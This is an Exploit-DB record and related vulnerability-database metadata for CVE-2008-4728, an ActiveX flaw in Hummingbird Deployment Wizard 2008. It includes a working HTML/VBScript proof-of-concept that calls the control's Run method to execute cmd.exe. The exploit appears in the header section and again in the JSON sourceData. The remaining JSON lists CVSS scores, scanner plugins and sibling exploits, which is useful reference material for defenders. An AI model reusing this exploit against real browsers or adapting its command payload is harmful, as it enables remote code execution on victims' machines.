ID EDB-ID:6773 Type exploitdb Reporter shinnai Modified 2008-10-17T00:00:00
Description
Hummingbird Deployment Wizard 2008 ActiveX Command Execution. CVE-2008-4728. Remote exploit for windows platform
------------------------------------------------------------------------------
Hummingbird Deployment Wizard 2008 (DeployRun.dll) Arbitrary File Execution
url: http://www.hummingbird.com
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.net
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Info:
DeployRun.dll <= 10.0.0.44
Marked as:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
Vulnerable method:
Sub Run (ByVal Path As String , ByVal CommandLine As String)
Tested on Windows XP Professional SP3 full patched, with Internet Explorer 7
There are a lot of dangerous methods, just take a look and... good searching
------------------------------------------------------------------------------
<object classid='clsid:7F9B30F1-5129-4F5C-A76C-CE264A6C7D10' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
<script language='vbscript'>
Sub tryMe
test.Run "cmd.exe", "/C calc.exe"
End Sub
</script>
# milw0rm.com [2008-10-17]
{"bulletinFamily": "exploit", "id": "EDB-ID:6773", "cvelist": ["CVE-2008-4728"], "modified": "2008-10-17T00:00:00", "lastseen": "2016-02-01T01:37:18", "edition": 1, "sourceData": "------------------------------------------------------------------------------\n Hummingbird Deployment Wizard 2008 (DeployRun.dll) Arbitrary File Execution\n url: http://www.hummingbird.com\n\n Author: shinnai\n mail: shinnai[at]autistici[dot]org\n site: http://www.shinnai.net\n\n This was written for educational purpose. Use it at your own risk.\n Author will be not responsible for any damage.\n \n Info:\n DeployRun.dll <= 10.0.0.44\n \n Marked as:\n RegKey Safe for Script: False\n RegKey Safe for Init: False\n Implements IObjectSafety: True\n IDisp Safe: Safe for untrusted: caller,data \n IPersist Safe: Safe for untrusted: caller,data\n\n Vulnerable method:\n Sub Run (ByVal Path As String , ByVal CommandLine As String)\n\n Tested on Windows XP Professional SP3 full patched, with Internet Explorer 7\n\n There are a lot of dangerous methods, just take a look and... good searching\n------------------------------------------------------------------------------\n<object classid='clsid:7F9B30F1-5129-4F5C-A76C-CE264A6C7D10' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>\n\n<script language='vbscript'>\n Sub tryMe\n test.Run \"cmd.exe\", \"/C calc.exe\"\n End Sub\n</script>\n\n# milw0rm.com [2008-10-17]\n", "published": "2008-10-17T00:00:00", "href": "https://www.exploit-db.com/exploits/6773/", "osvdbidlist": ["49178"], "reporter": "shinnai", "hash": "d3ef3369328b972769d5efad7c60ac888f342b046d6da33d29427b93dfec98dc", "title": "Hummingbird Deployment Wizard 2008 - ActiveX Command Execution", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Hummingbird Deployment Wizard 2008 ActiveX Command Execution. CVE-2008-4728. Remote exploit for windows platform", "references": [], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/6773/", "enchantments": {"vulnersScore": 4.0}}
{"result": {"cve": [{"id": "CVE-2008-4728", "type": "cve", "title": "CVE-2008-4728", "description": "Multiple insecure method vulnerabilities in the DeployRun.DeploymentSetup.1 (DeployRun.dll) ActiveX control 10.0.0.44 in Hummingbird Deployment Wizard 2008 allow remote attackers to execute arbitrary programs via the (1) Run and (2) PerformUpdateAsync methods, and (3) modify arbitrary registry values via the SetRegistryValueAsString method. NOTE: the SetRegistryValueAsString method could be leveraged for code execution by specifying executable file values to Startup folders.", "published": "2008-10-23T20:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4728", "cvelist": ["CVE-2008-4728"], "lastseen": "2017-09-29T14:26:10"}], "exploitdb": [{"id": "EDB-ID:6776", "type": "exploitdb", "title": "Hummingbird Deployment Wizard 2008 - ActiveX File Execution2", "description": "Hummingbird Deployment Wizard 2008 ActiveX File Execution(2). CVE-2008-4728. Remote exploit for windows platform", "published": "2008-10-17T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/6776/", "cvelist": ["CVE-2008-4728"], "lastseen": "2016-02-01T01:37:44"}, {"id": "EDB-ID:6774", "type": "exploitdb", "title": "Hummingbird Deployment Wizard 2008 Registry Values Creation/Change", "description": "Hummingbird Deployment Wizard 2008 Registry Values Creation/Change. CVE-2008-4728. Remote exploit for windows platform", "published": "2008-10-17T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/6774/", "cvelist": ["CVE-2008-4728"], "lastseen": "2016-02-01T01:37:27"}], "d2": [{"id": "D2SEC_HBDW", "type": "d2", "title": "DSquare Exploit Pack: D2SEC_HBDW", "description": "**Name**| d2sec_hbdw \n---|--- \n**CVE**| CVE-2008-4728 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| Hummingbird Deployment Wizard ActiveX Arbitrary Code Execution Vulnerability \n**Notes**| \n", "published": "2008-10-23T20:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_hbdw", "cvelist": ["CVE-2008-4728"], "lastseen": "2016-09-25T14:11:15"}], "openvas": [{"id": "OPENVAS:1361412562310900161", "type": "openvas", "title": "Hummingbird Deployment Wizard ActiveX Control Multiple Security Vulnerabilities", "description": "This host is installed with Deployment Wizard ActiveX Control and\n is prone to multiple security vulnerabilities. \n\n The multiple flaws are due to error in 'SetRegistryValueAsString()',\n 'Run()' and 'PerformUpdateAsync()' methods in DeployRun.DeploymentSetup.1\n (DeployRun.dll) ActiveX control.", "published": "2008-10-23T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900161", "cvelist": ["CVE-2008-4728"], "lastseen": "2018-04-06T11:16:16"}, {"id": "OPENVAS:900161", "type": "openvas", "title": "Hummingbird Deployment Wizard ActiveX Control Multiple Security Vulnerabilities", "description": "This host is installed with Deployment Wizard ActiveX Control and\n is prone to multiple security vulnerabilities. \n\n The multiple flaws are due to error in 'SetRegistryValueAsString()',\n 'Run()' and 'PerformUpdateAsync()' methods in DeployRun.DeploymentSetup.1\n (DeployRun.dll) ActiveX control.", "published": "2008-10-23T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=900161", "cvelist": ["CVE-2008-4728"], "lastseen": "2017-10-09T11:58:45"}]}}